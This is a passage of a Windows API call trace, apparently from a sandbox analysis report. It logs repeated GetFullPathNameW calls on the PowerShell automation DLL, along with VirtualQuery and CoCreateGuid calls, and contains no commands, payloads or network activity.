lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.910] GetLastError () returned 0x0 [0052.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.911] GetLastError () returned 0x0 [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | 
out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.912] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.912] GetLastError () returned 0x0 [0052.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 
| out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.913] GetLastError () returned 0x0 [0052.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.913] GetLastError () returned 0x0 [0052.913] VirtualQuery (in: lpAddress=0x14d690, lpBuffer=0x14e690, dwLength=0x1c | out: lpBuffer=0x14e690*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.913] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.913] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.914] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.914] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | 
out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.915] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.916] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.916] VirtualQuery (in: lpAddress=0x14d4cc, lpBuffer=0x14e4cc, dwLength=0x1c | out: lpBuffer=0x14e4cc*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.916] VirtualQuery (in: lpAddress=0x14d628, 
lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.918] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.918] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.918] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.918] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe026d500, Data2=0x3bc5, Data3=0x421b, Data4=([0]=0xae, [1]=0xe1, [2]=0x41, [3]=0x29, [4]=0x54, [5]=0x10, [6]=0x6, [7]=0x94))) returned 0x0 [0052.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.918] GetLastError () returned 0x0 [0052.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) 
returned 0x74 [0052.919] GetLastError () returned 0x0 [0052.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e098, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.919] GetLastError () returned 0x0 [0052.919] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xad238925, Data2=0x4ab0, Data3=0x4bfb, Data4=([0]=0xac, [1]=0xe6, [2]=0x46, [3]=0xae, [4]=0x29, [5]=0x5, [6]=0x8d, [7]=0x45))) returned 0x0 [0052.920] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.921] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.921] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.921] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.921] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.922] VirtualQuery (in: 
lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.922] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.922] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.922] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.923] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.923] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.923] VirtualQuery (in: lpAddress=0x14d284, lpBuffer=0x14e284, dwLength=0x1c | out: lpBuffer=0x14e284*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.923] VirtualQuery (in: lpAddress=0x14d2c0, lpBuffer=0x14e2c0, dwLength=0x1c | out: lpBuffer=0x14e2c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c 
[0052.924] VirtualQuery (in: lpAddress=0x14d6f4, lpBuffer=0x14e6f4, dwLength=0x1c | out: lpBuffer=0x14e6f4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.925] VirtualQuery (in: lpAddress=0x14d6f4, lpBuffer=0x14e6f4, dwLength=0x1c | out: lpBuffer=0x14e6f4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.925] VirtualQuery (in: lpAddress=0x14d6f4, lpBuffer=0x14e6f4, dwLength=0x1c | out: lpBuffer=0x14e6f4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.926] VirtualQuery (in: lpAddress=0x14d6f4, lpBuffer=0x14e6f4, dwLength=0x1c | out: lpBuffer=0x14e6f4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.926] VirtualQuery (in: lpAddress=0x14d324, lpBuffer=0x14e324, dwLength=0x1c | out: lpBuffer=0x14e324*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.926] VirtualQuery (in: lpAddress=0x14d360, lpBuffer=0x14e360, dwLength=0x1c | out: lpBuffer=0x14e360*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.927] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.927] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, 
Type=0x20000)) returned 0x1c [0052.927] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.927] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.928] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, 
State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.929] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.929] VirtualQuery (in: lpAddress=0x14d4cc, lpBuffer=0x14e4cc, dwLength=0x1c | out: lpBuffer=0x14e4cc*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.929] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.929] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.930] VirtualQuery (in: lpAddress=0x14d628, lpBuffer=0x14e628, dwLength=0x1c | out: lpBuffer=0x14e628*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.930] VirtualQuery (in: lpAddress=0x14d664, lpBuffer=0x14e664, dwLength=0x1c | out: lpBuffer=0x14e664*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.930] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x78bb53cb, Data2=0x4285, Data3=0x473e, Data4=([0]=0xa5, [1]=0xee, [2]=0x1c, [3]=0x6c, [4]=0xf0, [5]=0x72, [6]=0xb, [7]=0x69))) returned 0x0 [0052.931] VirtualQuery (in: lpAddress=0x14d324, lpBuffer=0x14e324, dwLength=0x1c | out: lpBuffer=0x14e324*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, 
